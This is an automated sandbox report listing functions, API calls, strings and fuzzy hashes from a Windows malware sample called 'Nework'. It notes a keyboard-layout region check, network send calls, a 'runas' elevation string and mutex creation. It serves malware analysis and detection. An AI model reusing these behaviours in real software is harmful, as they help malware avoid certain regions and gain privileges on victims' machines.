Instruction ID: 43978d31ad40df0b7fc7fcb25c5eb7d509d8e5d0e27fa03fc5a49e2734f66e14
Opcode Fuzzy Hash: 8099ebdf191f85927189ff9aa3244fea393d94f08c370de63e897bac7d0ae354
Instruction Fuzzy Hash: 4C211AB181015C9BDB2ADF15CD65BEAB7B8EB19704F0042D9E60AA3181D7745B88CFA0

Function 00475B20 Relevance: 23.2, APIs: 8, Strings: 5, Instructions: 426
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

00000419, xrefs: 00475FA8
Keyboard Layout\Preload, xrefs: 00475F64
00000423, xrefs: 0047600A
00000422, xrefs: 00475FD9
0000043f, xrefs: 0047603B

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: 270d7524b84b4d61feb97b3a2798a2d6a5ce809c8adf460bfa7c5f8ec6ef14cb
Instruction ID: 8b64fa9e8ee23293dd30598893f7c409450e467ce33f5f690fd4df8449464a29
Opcode Fuzzy Hash: 270d7524b84b4d61feb97b3a2798a2d6a5ce809c8adf460bfa7c5f8ec6ef14cb
Instruction Fuzzy Hash: 04F1D4709002489FDB24DF14CD84BDEBBB9EB45304F5085AEF519A72C1DBB89A84CF98

Function 004B18AC Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004B1565: CreateFileW.KERNELBASE(00000000,00000000,?,004B1955,?,?,00000000,?,004B1955,00000000,0000000C), ref: 004B1582

GetLastError.KERNEL32 ref: 004B19C0
__dosmaperr.LIBCMT ref: 004B19C7
GetFileType.KERNELBASE(00000000), ref: 004B19D3
GetLastError.KERNEL32 ref: 004B19DD
__dosmaperr.LIBCMT ref: 004B19E6
CloseHandle.KERNEL32(00000000), ref: 004B1A06
CloseHandle.KERNEL32(004AAA82), ref: 004B1B53
GetLastError.KERNEL32 ref: 004B1B85
__dosmaperr.LIBCMT ref: 004B1B8C

Strings

H, xrefs: 004B1B11

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: bc4e8be917e80130ef4a43cbb7970b77b668d736e973d2ac0ba874b7c5f9be93
Instruction ID: 279b4cb1a0f9b04118264e35a9d55ec98a6df67142ffefe0a376e3508444da73
Opcode Fuzzy Hash: bc4e8be917e80130ef4a43cbb7970b77b668d736e973d2ac0ba874b7c5f9be93
Instruction Fuzzy Hash: 34A13732A141449FCF19DF68DCA1BEE3BA1AB07324F14015FE812AB3A1D7399912D769

Function 0047D5EC Relevance: 13.9, APIs: 9, Instructions: 446
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0047D763
CreateDirectoryA.KERNELBASE(00000000,00000000), ref: 0047D87F
send.WS2_32(?,?,00000004,00000000), ref: 0047DA7E
send.WS2_32(?,?,00000008,00000000), ref: 0047DABA

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID: send$CreateDirectoryFileModuleName
String ID:
API String ID: 2319890793-0
Opcode ID: 89bfe7a0fd9fb5f43fda2ff4a37b827b87b3079fdad73e81c226b678b9dcdbe6
Instruction ID: 2ed6401a60d00611f61d04fa924fa29f396b686275197000439f62f7f9d454f8
Opcode Fuzzy Hash: 89bfe7a0fd9fb5f43fda2ff4a37b827b87b3079fdad73e81c226b678b9dcdbe6
Instruction Fuzzy Hash: 7CF13471D102189BDB24EB28CC49BEDB774AF45314F1042DEE41CA72C1DB79AE84CB99

Function 0047D91C Relevance: 6.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09ef2ff6bb8f1b366f8243c00b0eafe5d5b4e43d73bb8d9a6b3bd01b8ce9a9db
Instruction ID: cb24e6e5c5d9feae6f413bef6c3373cf7dec1032d2d16df0bce4be5cf9c4f7d4
Opcode Fuzzy Hash: 09ef2ff6bb8f1b366f8243c00b0eafe5d5b4e43d73bb8d9a6b3bd01b8ce9a9db
Instruction Fuzzy Hash: C9411772E101149BCB18DB78DC95BAEB7B4EF85324F10466EE819E33D1DA34AD408B98

Function 004776C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 468
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(000003E8), ref: 00477989

Strings

runas, xrefs: 00477213

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: runas
API String ID: 3472027048-4000483414
Opcode ID: 8d5a2da11a2ba69ca638a7a6893f4b1cdfa1a503c3601f6cdf7005726d908941
Instruction ID: 36ee4e7c012398a2d06a8c77e65bbe0c36167284c9d56319f6fa65ee7e6c056f
Opcode Fuzzy Hash: 8d5a2da11a2ba69ca638a7a6893f4b1cdfa1a503c3601f6cdf7005726d908941
Instruction Fuzzy Hash: F0E14A71A00104ABDB08FB78CE467DD7B61DF42718F60865EF4189B3C6DB7D9A408799

Function 0047C206 Relevance: 3.5, APIs: 2, Instructions: 532
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00487860: __Cnd_destroy_in_situ.LIBCPMT ref: 00487958
Part of subcall function 00487860: __Mtx_destroy_in_situ.LIBCPMT ref: 00487961

Sleep.KERNEL32(000003E8), ref: 0047C659

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situMtx_destroy_in_situSleep
String ID:
API String ID: 113500496-0
Opcode ID: bd3e399edfe5bad5a287f2daf5ceee1bac01311c28c4640580b9cdcdfa2149a0
Instruction ID: 068f01da1d221d4a199987c52fdad9d0b5361cb5151ee1fabc8135604a6aac42
Opcode Fuzzy Hash: bd3e399edfe5bad5a287f2daf5ceee1bac01311c28c4640580b9cdcdfa2149a0
Instruction Fuzzy Hash: 5B12E571A001089BDF04DF68C9C5BEDBBB5EF45304F64851EF819A7282D739EA84CB99

Function 00486B90 Relevance: 3.0, APIs: 2, Instructions: 23
sleepthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00479870: Sleep.KERNELBASE(00000064), ref: 0047A7D3
Part of subcall function 00479870: CreateMutexA.KERNELBASE(00000000,00000000,004D3224), ref: 0047A7F1
Part of subcall function 00479870: GetLastError.KERNEL32 ref: 0047A7F9
Part of subcall function 00479870: GetLastError.KERNEL32 ref: 0047A80A

Part of subcall function 00475B20: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,80000001,0000043f,00000008,00000423,00000008,00000422,00000008,00000419,00000008), ref: 0047608D

CreateThread.KERNEL32(00000000,00000000,Function_00016AD0,00000000,00000000,00000000), ref: 00486B70
Sleep.KERNEL32(00007530), ref: 00486B85

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID: CreateErrorLastSleep$MutexOpenThread
String ID:
API String ID: 2377761554-0
Opcode ID: 4df161699c02bf40dc9b496abe1a9c8fc25c8c6cfafcecbbb29b6b9334fc1d92
Instruction ID: 9a55cde2d343e6db107b684c8b05cec2a4b7c047ab317c9a5ed7bc1f1efad36a
Opcode Fuzzy Hash: 4df161699c02bf40dc9b496abe1a9c8fc25c8c6cfafcecbbb29b6b9334fc1d92
Instruction Fuzzy Hash: 53E08C34AA5724A6E26037A66C07F9D7A14AF09B59F26811BF21D2A0D29ADC300053AF

Function 0047CFA9 Relevance: 1.9, APIs: 1, Instructions: 386
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0047CFB7

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: 503671ea1f12ca2d7f14a1c553def1a66d2b7e50e17625cfaa45fb5373754236
Instruction ID: 3efcaa2c20d99e40154205fcdaa1ca7c9d441c21185c291ee503305f56b55aa9
Opcode Fuzzy Hash: 503671ea1f12ca2d7f14a1c553def1a66d2b7e50e17625cfaa45fb5373754236
Instruction Fuzzy Hash: 8CE11931E101449BEB19EB28CD457DDBB71AF46308F6082CEE40C6B3C2D7799B858B95

Function 0047D520 Relevance: 1.7, APIs: 1, Instructions: 164
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf1a3545d8a60179f7877a73fafc296dd48238fb8728584a37ed1011998fa541
Instruction ID: 657c9e8c31292537351093e44232d7104a2ae7a4c1d202fc0fb96d253c952700
Opcode Fuzzy Hash: bf1a3545d8a60179f7877a73fafc296dd48238fb8728584a37ed1011998fa541
Instruction Fuzzy Hash: 7051CA70D042189BEB25DB24CD88BDEBBB1AB4A304F5085DAD44867282DB795FC8CF95

Function 0047C740 Relevance: 1.6, APIs: 1, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c414e5a11302286520cd1f1496fdcbd88fa051fbc8b53a5232551d05a702114a
Instruction ID: f683f9588d5c69b2a53412dcb118dc9a0efb2e39a964c958dd70e8c397cc40f3
Opcode Fuzzy Hash: c414e5a11302286520cd1f1496fdcbd88fa051fbc8b53a5232551d05a702114a
Instruction Fuzzy Hash: 5F31A031A10248AFDB04DF68C985BDEBBB2FF49704F50861EF805A7281D7799980CB94

Function 004AAA43 Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__wsopen_s.LIBCMT ref: 004AAA7D

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: e13e4414397c9e54548acc42ec78827372cd28b98e0efa19b8237b026051b7bf
Instruction ID: 5f5a266358f66d90f38f0c22ef0c9978560af279e7073e83a5ce59be9e907d74
Opcode Fuzzy Hash: e13e4414397c9e54548acc42ec78827372cd28b98e0efa19b8237b026051b7bf
Instruction Fuzzy Hash: 84111575A0420AAFCB05DF99E9419DB7BF4EF49308F04406AF809AB351D734EE25CB69

Function 004B181E Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004B1881

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: ff89ec45d56ad598fc1cdac097a9ffa15eccbe9b6325dd4b30191e09ed1fe268
Instruction ID: ee32e37e3e62482832334574567639ddb32bdcd4cb81aeb804ed44d6b07aa232
Opcode Fuzzy Hash: ff89ec45d56ad598fc1cdac097a9ffa15eccbe9b6325dd4b30191e09ed1fe268
Instruction Fuzzy Hash: 08014F72C00159AFCF02EFA98C019EEBFB5BF09314F14416AF914E2161E7358A21DB95

Function 004B1565 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,004B1955,?,?,00000000,?,004B1955,00000000,0000000C), ref: 004B1582

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8dc47242dc70f9bfd1c67bda1d7bdc515735d7ed1039bcdc043224ef7a97d274
Instruction ID: d7718f4c69b50448f15b13e2f39281450656ca767c71acc5e4a22cd4b42bba52
Opcode Fuzzy Hash: 8dc47242dc70f9bfd1c67bda1d7bdc515735d7ed1039bcdc043224ef7a97d274
Instruction Fuzzy Hash: E4D06C3201010DFBDF028F84DC06EDE3BAAFB48714F014150BA1856020C732E861AB94

Function 00478622 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?), ref: 00478629

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a7bf1e34b819dbb56fb8f9435f21b401d57857d0fa6532db1858840ed6b7e3b8
Instruction ID: 3a25cc2f021f268bd0ef1cece7059e6f7f1df6b85a7d87ba491f6f1ee50352aa
Opcode Fuzzy Hash: a7bf1e34b819dbb56fb8f9435f21b401d57857d0fa6532db1858840ed6b7e3b8
Instruction Fuzzy Hash: BDC08C30041A006AEE1C0A3C6B8C4DA33029A433E97D45BCED0798A6F1CB3D5807D608

Function 00478620 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?), ref: 00478629

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 2a058eba620ea5b9d01ea4a8568a7183e422fbf322f10a5f693af8556428ecc0
Instruction ID: 7e920dd847270e528d705ff3caf11b3ad76417440c419ff9968ef71db7241fbc
Opcode Fuzzy Hash: 2a058eba620ea5b9d01ea4a8568a7183e422fbf322f10a5f693af8556428ecc0
Instruction Fuzzy Hash: 0BC08030041500ABD61C4B3C774C49533119B033593E04B9DD035865F1CB3EC403C718

Non-executed Functions

Function 00491462 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00492B5C: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00492B6F

Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 00491474

Part of subcall function 00492C6F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 00492C99
Part of subcall function 00492C6F: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 00492D08

Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 004915A6
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00491606
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00491612
Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 0049164D
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 0049166E
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 0049167A
Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00491683
Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 0049169B

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
String ID:
API String ID: 2508902052-0
Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction ID: 75d3749c03d2c22fecb9e4f3041c3e9b765e836a6b3d653272aa518d9e651e80
Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction Fuzzy Hash: DA815C71E00226AFCF18DF69C58096EBBB5BF88314B1646BED406A7711C774ED42CB88

Function 004B2307 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 373timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004B2389
_free.LIBCMT ref: 004B23AD
_free.LIBCMT ref: 004B253A
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,004C6758), ref: 004B254C
_free.LIBCMT ref: 004B2706

Strings

XgL, xrefs: 004B24F5, 004B24FB
XgL, xrefs: 004B2669

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID: XgL$XgL
API String ID: 597776487-495797694
Opcode ID: d7f9675b4f54dff99104e79d98987cb5448f11cedec980c9b93722f6d0da954f
